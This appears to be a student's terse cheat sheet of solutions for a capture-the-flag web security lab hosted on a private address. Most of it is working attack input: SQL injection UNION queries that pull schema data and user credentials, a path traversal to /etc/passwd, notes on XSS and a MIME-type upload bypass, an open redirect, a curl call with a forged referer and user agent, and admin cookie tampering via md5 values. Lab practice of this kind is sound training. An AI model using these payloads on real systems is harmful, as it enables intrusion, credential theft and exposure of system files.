SQLI

http://172.16.0.128/index.php?page=member&id=1+UNION+SELECT%20column_name%2C+table_schema+from+information_schema.columns&Submit=Submit#


http://172.16.0.128/index.php?page=member&id=1+UNION+SELECT%20commentaire%2C+countersign+from+users&Submit=Submit#


http://172.16.0.128/index.php?page=member&id=1+UNION+SELECT%20table_name%2C+table_schema+from+information_schema.tables&Submit=Submit#


http://172.16.0.128/index.php?page=member&id=1+UNION+SELECT%20username%2C+password%20from%20Member_Brute_Force.db_default&Submit=Submit#


DIRECTORY TRAVERSAL

http://172.16.0.128/index.php?page=../../../../../../../etc/passwd


XSS
http://172.16.0.128/index.php?page=feedback
script dans nimporte quel champ


UPLOAD MIME TYPE

http://172.16.0.128/index.php?page=upload#
change the mime type to image/jpg

RFI

http://172.16.0.128/index.php?page=media&src=nsa


redirect
http://172.16.0.128/index.php?page=redirect&site=lol

pagecachée
http://172.16.0.128/index.php?page=e43ad1fdc54babe674da7c7b8f0127bde61de3fbe01def7d00f151c2fcca6d1c
source -> 

    You must cumming from : "https://www.nsa.gov/" to go to the next step (set referer)
	    Let's use this browser : "ft_bornToSec". It will help you a lot (set user agent)


		curl http://172.16.0.128/index.php\?page\=e43ad1fdc54babe674da7c7b8f0127bde61de3fbe01def7d00f151c2fcca6d1c -A "ft_bornToSec" --referer "https://www.nsa.gov/"  | grep flag


		ROBOTS
		http://172.16.0.128/robots.txt

		/.hidden -> wget -r http://172.16.0.128/.hidden -> getthe flag
		/whatever/htaccess : hashhmd5 d'1 mdp


		COOKIE i_am_admin

		68934a3e9455fa72420237eb05902327 -> true (md5)
		b326b5062b2f0e69046810717534cb09 -> true (md5) -> gettheflag
